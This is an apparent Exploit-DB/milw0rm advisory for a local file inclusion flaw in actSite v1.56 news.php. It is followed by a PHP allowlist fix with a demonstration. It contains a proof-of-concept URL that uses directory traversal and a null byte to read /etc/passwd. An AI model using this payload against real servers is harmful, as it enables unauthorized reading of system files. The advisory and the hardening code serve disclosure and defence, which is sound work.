vendor: actSite
by: DNX
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 22
Product Name: actSite
Affected Version From: v1.56
Affected Version To: v1.56
Patch Exists: YES
Platforms Tested:
2007

actSite v1.56 (news.php) Local File Inclusion

actSite v1.56 is vulnerable to Local File Inclusion in news.php. The vulnerability allows an attacker to include local files from the server by manipulating a POST parameter that news.php uses. With a specially crafted request, an attacker can include arbitrary files and potentially read sensitive information from the server.

Mitigation:

Install security update to v1.57

Exploit-DB raw data:

                         \#'#/
                         (-.-)
   -----------------oOO---(_)---OOo-----------------
   | actSite v1.56 (news.php) Local File Inclusion |
   |                 coded by DNX                  |
   -------------------------------------------------

[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes



[!] Background: actSite is a content management system based on PHP and MySQL



[!] Bug: in phpinc/news.php line 101



         require PHP_INCLUDE_PATH."/inc/news/news_$_POST[do].php";



[!] PoC: 

    - http://[site]/[path]/phpinc/news.php?do=/../../../../../../../etc/passwd%00



[!] Description:

    - So why can we inject code into a POST variable via the URL? Let's do some research...

      - In phpinc/news.php line 36

        require_once('../config.php');

      - Let's take a look in 'config.php' line 22

        if(empty($BaseCfg['install_run'])) require_once($BaseCfg['BaseDir']."/phpinc/inc/csb.php");

      - OK, let's take a look in 'phpinc/inc/csb.php' line 18

        if(getenv('REQUEST_METHOD') == "GET") {
            foreach($_GET as $key => $val) {
                $_POST[$key] =& $_GET[$key];
            }
        }



[!] Solution: Install security update to v1.57

# milw0rm.com [2007-10-01]
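
One way to harden the require on line 101 of phpinc/news.php, shown as an added example (not actSite's code and not the v1.57 patch): the request value is looked up in an allowlist and never concatenated into the path, so the result is the same whether `do` arrives by POST or is copied from GET by csb.php. The function name, the `NEWS_ACTIONS` entries and the temporary directory tree are assumptions made for the demonstration.

```php
<?php
// Added example, not actSite code. Action names in NEWS_ACTIONS are hypothetical.
// Map each permitted action to a fixed file name under inc/news/.
const NEWS_ACTIONS = ['list' => 'news_list.php', 'show' => 'news_show.php'];

/**
 * Return the absolute path of the include for $do, or null if it is not allowed.
 * The request value is used only as an array key, never as part of the path.
 */
function resolve_news_include(string $includeRoot, $do): ?string
{
    if (!is_string($do) || !array_key_exists($do, NEWS_ACTIONS)) {
        return null; // traversal sequences, NUL bytes, arrays and unknown actions
    }
    $base = realpath($includeRoot . '/inc/news');
    if ($base === false) {
        return null;
    }
    $file = realpath($base . DIRECTORY_SEPARATOR . NEWS_ACTIONS[$do]);
    // Defence in depth: the resolved file must exist and stay inside inc/news,
    // which also catches a symlink or a bad allowlist entry.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($file === false || strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// In news.php the call would replace the require on line 101 (sketch):
//   $file = resolve_news_include(PHP_INCLUDE_PATH, $_POST['do'] ?? null);
//   if ($file === null) { http_response_code(400); exit; }
//   require $file;

// Demonstration against a constructed temporary tree.
$root = sys_get_temp_dir() . '/actsite_demo_' . getmypid();
mkdir($root . '/inc/news', 0700, true);
file_put_contents($root . '/inc/news/news_list.php', "<?php // constructed stub\n");

$inputs = ['list', 'show', '/../../../../etc/passwd', "list\0", ['list'], null];
foreach ($inputs as $do) {
    $path = resolve_news_include($root, $do);
    echo json_encode($do), ' => ', $path === null ? 'rejected' : 'allowed', "\n";
}

unlink($root . '/inc/news/news_list.php');
rmdir($root . '/inc/news');
rmdir($root . '/inc');
rmdir($root);
```

Only `list` resolves in the demonstration: `show` is on the allowlist but has no file in the constructed tree, and every other input fails the key lookup before any path is built.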